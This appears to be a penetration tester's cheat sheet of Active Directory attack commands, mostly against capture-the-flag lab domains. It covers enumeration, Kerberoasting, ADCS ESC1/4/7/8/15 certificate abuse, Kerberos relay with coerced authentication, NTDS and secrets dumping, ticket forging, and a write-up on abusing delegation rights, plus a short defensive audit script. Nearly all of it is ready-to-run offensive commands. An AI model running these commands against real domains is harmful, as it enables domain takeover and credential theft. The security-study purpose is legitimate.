documents
https://github.com/CravateRouge/bloodyAD/wiki/User-Guide
https://www.netexec.wiki/
https://bloodhound.specterops.io/resources/edges/overview
misc
```
sudo timedatectl set-ntp off
sudo timedatectl set-ntp on
sudo ntpdate 10.129.236.176
echo "10.129.176.30 baby.vl BabyDC.baby.vl" | sudo tee -a /etc/hosts
export KRB5CCNAME=
unset KRB5CCNAME
echo -n 'P@ssw0rd' | iconv -f UTF-8 -t UTF-16LE | openssl dgst -md4 | awk '{print $2}'
nxc smb 10.129.95.210 -u '' -p '' --shares
nxc smb 10.129.95.210 -u 'guest' -p '' --shares
nxc smb 10.129.95.210 -u '' -p '' --rid-brute
nxc smb 10.129.95.210 -u '' -p '' --users
nxc smb 10.129.95.210 -u '' -p '' --groups
nxc smb 10.129.95.210 -u '' -p '' --pass-pol
ldapsearch -H ldap://10.129.95.210 -x -b "DC=htb,DC=local" "(objectClass=person)"
rpcclient -U "" -N 10.129.95.210
# inside rpcclient:
enumdomusers
enumdomgroups
querydispinfo
```
bloodhound-ce
```
bloodhound-ce-python -d <FQDN> -dc <DC-FQDN> -ns <dc-ip> --dns-tcp -u <user> -p <pass> -c ALL --zip
rusthound-ce --domain <FQDN> -u <user> -p <pass> --zip
```
bloodyAD
```
bloodyAD --dc-ip <dc-ip> -d <FQDN> -u <user> -p <pass/hash> [-k] <subcommand>
# subcommands:
get object 'Domain Admins' --attr member
get object 'Admin' --attr 'servicePrincipalName'
get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 --base 'CN=Deleted Objects,DC=tombwatcher,DC=htb' --filter "(&(isDeleted=TRUE)(sAMAccountName=*))" --attr sAMAccountName
set password 'Admin' P@ssw0rd
set object 'Admin' 'servicePrincipalName' -v 'http/whatever'
set restore <target>
add groupMember 'Domain Admins' hacker
add shadowCredentials <target>
remove uac <target> -f ACCOUNTDISABLE
```
impacket
```
impacket-smbclient <FQDN>/<user>:<pass>@10.129.234.44
impacket-GetNPUsers
impacket-GetUserSPNs -outputfile kerberoast.txt -request -dc-ip <dc-ip> <FQDN>/<user>:<pass>
impacket-changepasswd -newpass Abc@123 -protocol rpc-samr <FQDN>/<user>:<pass>@<ip>
impacket-reg <FQDN>/<user>:'Abc@123'@<ip> backup -o 'c:\programdata'
impacket-getTGT -dc-ip <dc-ip> <FQDN>/<user>:<pass>
impacket-getST -spn <SPN> -impersonate Administrator -altservice 'cifs' -hashes :xxx <FQDN>/'<user>'
impacket-getST -spn <SPN> -impersonate Administrator -dc-ip <dc-ip> <FQDN>/<user>:<pass>
impacket-secretsdump -sam SAM.save -system SYSTEM.save LOCAL
impacket-secretsdump -k -no-pass [email protected]
impacket-findDelegation -dc-ip <dc-ip> <FQDN>/<user>:<pass>
impacket-addcomputer -computer-name 'test$' -computer-pass 'Asd@123' -dc-ip <dc-ip> <FQDN>/<user>:<pass>
impacket-dacledit -dc-ip <dc-ip> -principal john -target-dn 'CN=Deleted Objects,DC=tombwatcher,DC=htb' -action read <FQDN>/<user>:<pass>
impacket-dacledit -dc-ip <dc-ip> -principal judith -target <target> -action 'write' -rights 'WriteMembers' <FQDN>/<user>:<pass>
impacket-rbcd -dc-ip <dc-ip> -delegate-to <target> -delegate-from <something> -action write <FQDN>/<user>:<pass>
impacket-describeTicket <some.ccache>
impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain breach.vl -domain-sid S-1-5-21-2330692793-3312915120-706255856 -spn MSSQLSvc/breachdc.breach.vl Administrator
impacket-owneredit -dc-ip <dc-ip> -action write -new-owner <some-user> -target <target> <FQDN>/<user>:<pass>
```
certipy
```
certipy-ad find -u 'operator' -p 'operator' -dc-ip 10.129.7.88 -vulnerable -stdout -enabled -hide-admins
certipy-ad cert -pfx administrator.pfx -nokey -out administrator.crt
certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key
passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target trainee -elevate -domain retro.vl -dc-host 10.129.234.44
certipy-ad shadow auto -dc-ip 10.129.236.176 -u SAM -p 'P@ssw0rd' -account john
```
keycred
```
keycred list --scheme ldap --dc 10.129.234.69 -u 'delegate.vl\A.Briggs' -p 'pass' -t 'N.Thompson'
keycred add --scheme ldap --dc DC1.delegate.vl -u 'delegate.vl\A.Briggs' -p 'pass' -t 'N.Thompson'
keycred auth --scheme ldap --dc DC1.delegate.vl -u 'delegate.vl\A.Briggs' -p 'pass' --pfx N.Thompson_2.pfx
keycred clear --scheme ldap --dc 10.129.234.69 -u 'delegate.vl\A.Briggs' -p 'pass' -t 'N.Thompson'
```
NTDS
```
# backup.txt (diskshadow script)
set verbose on
set context persistent nowriters
set metadata C:\Windows\Temp\0xdf.cab
add volume c: alias 0xdf
create
expose %0xdf% z:
```
```
diskshadow /s C:\programdata\backup.txt
robocopy /b Z:\Windows\ntds . ntds.dit
```
```
gettgtpkinit.py -cert-pem N7JwTHYi_cert.pem -key-pem N7JwTHYi_priv.pem -dc-ip 10.129.236.176
export KRB5CCNAME=raj.ccache
getnthash.py -key 56b304876557c0cc53482e6aaadf510058c4baf2d4be93b85b39fae511f9d2d3 tombwatcher.htb/john
```
coerce auth
```
dfscoerce.py -k -no-pass -dc-ip 10.129.236.109 -target-ip 10.129.236.109 -d cicada.vl 'DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' DC-JPQ225.cicada.vl
```
Relay kerberos:
```
krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv' --adcs --template DomainController -v 'DC-JPQ225$'
addspn.py -dc-ip 10.129.234.118 -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/test.delegate.vl' -t 'test$' dc1.delegate.vl
dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -dc-ip 10.129.234.118 -dns-ip 10.129.234.118 --tcp -r "test.delegate.vl" --type A -d 10.10.14.95 --action add dc1.delegate.vl
```
nxc
```
nxc ldap <ip> -u '' -p '' --query "(sAMAccountName=*)" ""
nxc ldap <ip> -u <user> -p <pass> --gmsa
nxc ldap <ip> -u <user> -p <pass> --groups
nxc winrm <ip> -u <user> -p <pass> -X "hostname"
```
evil-winrm
```
evil-winrm -i <ip/hostname> -u <user> -p <pass>
```
ldapsearch
```
# null session
ldapsearch -H ldap://10.10.117.140 -x -s base namingcontexts
ldapsearch -H ldap://10.10.117.140 -x -b "DC=baby,DC=vl"
nxc ldap 10.129.176.30 -u '' -p '' --query "(sAMAccountName=*)" "" > ldap.txt
ldapsearch -H ldap://10.10.117.140 -x -b "DC=baby,DC=vl" "(objectClass=person)"
ldapsearch -H ldap://10.10.117.140 -x -b "DC=baby,DC=vl" | grep -E "(sAMAccountName|description)"
# pre-Windows 2000 computer accounts (userAccountControl=4128 = WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD)
ldapsearch -H ldap://10.10.85.6 -x -D 'retro\trainee' -w 'trainee' -b "DC=retro,DC=vl" "(userAccountControl=4128)"
# ADCS enrollment services filter
(objectClass=pKIEnrollmentService)
```
ADCS ESC1
```
certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -ca AUTHORITY-CA [-target <DC-FQDN>] -template CorpVPN -upn [email protected] [-sid xxxx]
certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
```
ESC4
```
certipy-ad template -u <user> -p <password> -dc-ip <dc-ip> -template SendaiComputer -write-default-configuration -no-save
```
Then attack with ESC1
ESC7
```
certipy-ad ca -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -add-officer <user>
certipy-ad ca -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -enable-template SubCA
certipy-ad req -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -template SubCA -upn [email protected]
certipy-ad ca -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -issue-request 19
certipy-ad req -u '<user>' -p <password> -dc-ip <dc-ip> -ca '<CA-name>' -retrieve 19
certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
```
ESC8 kerberos relay:
```
dnstool.py -u <user> -p <password> -k -dc-ip <dc-ip> -dns-ip <dc-ip> --tcp -r "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" -d <hacker-ip> --action add <target-HOST>
krbrelayx.py -t 'http://dc.cicada.vl/certsrv' --adcs --template DomainController -v 'DC$'
dfscoerce.py -k -no-pass -dc-ip <dc-ip> -target-ip <target-ip> -d <FQDN>
certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
```
ESC15
EXP A:
```
certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template WebServer -upn [email protected] -application-policies 'Client Authentication'
certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
```
EXP B:
```
certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template WebServer -upn [email protected] -application-policies 'Certificate Request Agent'
certipy-ad req -u <user> -p <password> -dc-ip <dc-ip> -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template User -pfx administrator.pfx -on-behalf-of 'tombwatcher\Administrator'
certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>
```
KDC_ERR_PADATA_TYPE_NOSUPP
```
certipy-ad cert -pfx administrator.pfx -nokey -out administrator.crt
certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key
```
RBCD:
```
passthecert.py -crt administrator.crt -key administrator.key -domain <FQDN> -dc-ip <dc-ip> -action write_rbcd -delegate-from 'hack$' -delegate-to 'DC$'
```
DcSync:
```
passthecert.py -crt administrator.crt -key administrator.key -domain <FQDN> -dc-ip <dc-ip> -action modify_user -target trainee -elevate
```
SeEnableDelegationPrivilege exploitation details

1. Modifying the attributes related to unconstrained and constrained delegation requires the SeEnableDelegationPrivilege privilege; resource-based constrained delegation does not.
2. The delegation flags in userAccountControl: TRUSTED_FOR_DELEGATION - unconstrained; TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION - constrained.
3. Constrained delegation additionally requires the msDS-AllowedToDelegateTo attribute to be configured.

Scenario: A.Briggs has GenericWrite over N.Thompson; N.Thompson holds the SeEnableDelegationPrivilege privilege.

Idea: use A.Briggs's GenericWrite over N.Thompson to modify the SPN, userAccountControl and msDS-AllowedToDelegateTo so that N.Thompson is configured for constrained delegation to the DC, after which a ticket can be obtained directly for privilege escalation.

In practice: the SPN was modified normally, but userAccountControl and msDS-AllowedToDelegateTo both failed with: insufficientAccessRights for CN=N.Thompson,CN=Users,DC=delegate,DC=vl (Attr) — Reason:(ERROR_PRIVILEGE_NOT_HELD) A required privilege is not held by the client.

Root cause analysis: the inference is that GenericWrite does not allow modifying every attribute. BloodHound describes GenericWrite as `Generic Write access grants you the ability to write to any non-protected attribute on the target object`, so evidently some attributes cannot be modified directly.

Looking at the MS-ADTS Active Directory technical specification, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/d2435927-0999-4c62-8c6d-13ba31a52e1a, section 3.1.1.5.3.1 Security Considerations contains this sentence: `If the msDS-AllowedToDelegateTo attribute is modified, then the requester MUST possess SE_ENABLE_DELEGATION_PRIVILEGE.` In other words, Microsoft applies two security checks to modifications of msDS-AllowedToDelegateTo:

1. Privilege: whether the caller's access token holds SE_ENABLE_DELEGATION_PRIVILEGE (SeEnableDelegationPrivilege)
2. ACL: whether the caller has permission to modify the attribute

Follow-up analysis: so A.Briggs fails because it lacks SeEnableDelegationPrivilege. Starting from N.Thompson instead, can it modify its own delegation-related attributes? Clearly not, because by default there is no ACL right to modify one's own attributes. Then, with MAQ != 0, could N.Thompson create a new machine account object, use owner rights to modify the machine account object's delegation-related attributes, and then use constrained delegation to attack the DC?
Test results:

| Operation | With SeEnableDelegationPrivilege | Without SeEnableDelegationPrivilege |
| --- | --- | --- |
| Modify userAccountControl | success | failure |
| Modify msDS-AllowedToDelegateTo | failure | failure |

As shown, modifying msDS-AllowedToDelegateTo fails. Based on the two security checks above, the hypothesis is: owner rights cannot modify msDS-AllowedToDelegateTo but can modify userAccountControl; if the ACL grants full control or write rights, the modification succeeds. Below is a control experiment on a machine account:

| Operation | Owner rights | GenericAll |
| --- | --- | --- |
| Modify userAccountControl | success | success |
| Modify msDS-AllowedToDelegateTo | failure | success |

How to exploit: since only userAccountControl can be modified under owner rights, the machine account object can be switched to unconstrained delegation, because that does not involve modifying msDS-AllowedToDelegateTo; add a DNS record in the domain pointing to the attacking machine, start krbrelayx listening on the attacking machine, and coerce the domain controller to authenticate to the machine account object.

Summary: modifying the attributes related to unconstrained and constrained delegation requires not only the SeEnableDelegationPrivilege privilege but also a high-level write ACL right; the rights held by the default Owner are not sufficient to modify them.
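The defensive counterpart of the analysis above, as an added example that is not part of the original notes: an audit that decodes the userAccountControl delegation bits (TRUSTED_FOR_DELEGATION, TRUSTED_TO_AUTH_FOR_DELEGATION), checks that constrained delegation also carries msDS-AllowedToDelegateTo, flags RBCD and the userAccountControl=4128 pre-Windows 2000 pattern from the ldapsearch section, and runs over a constructed LDAP-export-shaped sample (attribute names are the real AD ones; account names and values are made up).

```python
# Added example (not from the original notes): decode userAccountControl
# delegation bits and flag the settings discussed above. The sample records
# are constructed; attribute names are real AD names, accounts are made up.
UAC_FLAGS = {
    "PASSWD_NOTREQD": 0x20,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # set on domain controllers
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained, protocol transition
}

def decode_uac(value):
    """Return the set of known flag names set in a userAccountControl value."""
    return {name for name, bit in UAC_FLAGS.items() if int(value) & bit}

def audit_delegation(records):
    """Return (sAMAccountName, finding) pairs for delegation-related settings."""
    findings = []
    for rec in records:
        name = rec["sAMAccountName"]
        flags = decode_uac(rec.get("userAccountControl", 0))
        targets = rec.get("msDS-AllowedToDelegateTo", [])
        is_dc = "SERVER_TRUST_ACCOUNT" in flags
        # Unconstrained delegation is expected on DCs, worth review anywhere else.
        if "TRUSTED_FOR_DELEGATION" in flags and not is_dc:
            findings.append((name, "unconstrained delegation on a non-DC account"))
        # Constrained delegation needs msDS-AllowedToDelegateTo as well as the UAC bit.
        if "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags and not targets:
            findings.append((name, "protocol transition set but no msDS-AllowedToDelegateTo"))
        if targets:
            findings.append((name, "constrained delegation to " + ", ".join(targets)))
        if rec.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
            findings.append((name, "resource-based constrained delegation configured"))
        # 4128 = WORKSTATION_TRUST_ACCOUNT | PASSWD_NOTREQD: pre-Windows 2000 computer.
        if {"WORKSTATION_TRUST_ACCOUNT", "PASSWD_NOTREQD"} <= flags:
            findings.append((name, "pre-Windows 2000 computer account (PASSWD_NOTREQD)"))
    return findings

# Constructed sample, not real domain data.
SAMPLE = [
    {"sAMAccountName": "DC1$", "userAccountControl": 0x82000},
    {"sAMAccountName": "TEST$", "userAccountControl": 0x81000},
    {"sAMAccountName": "N.Thompson", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["cifs/dc1.delegate.vl"]},
    {"sAMAccountName": "OLDPC$", "userAccountControl": "4128"},
    {"sAMAccountName": "SVC$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": "<security descriptor bytes>"},
]
```

Running `audit_delegation(SAMPLE)` reports TEST$, N.Thompson, OLDPC$ and SVC$ and stays silent on DC1$, whose unconstrained delegation is expected for a domain controller.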
RBCD exploitation details

Standard approach: MAQ != 0, add a machine account, modify RBCD.
With SPN write rights: MAQ != 0 or MAQ = 0, add an SPN to an ordinary domain user, modify RBCD.
With password change rights (SetNTLMHash): MAQ != 0 or MAQ = 0, set an ordinary domain user's password to a known hash and use S4U + U2U, modify RBCD.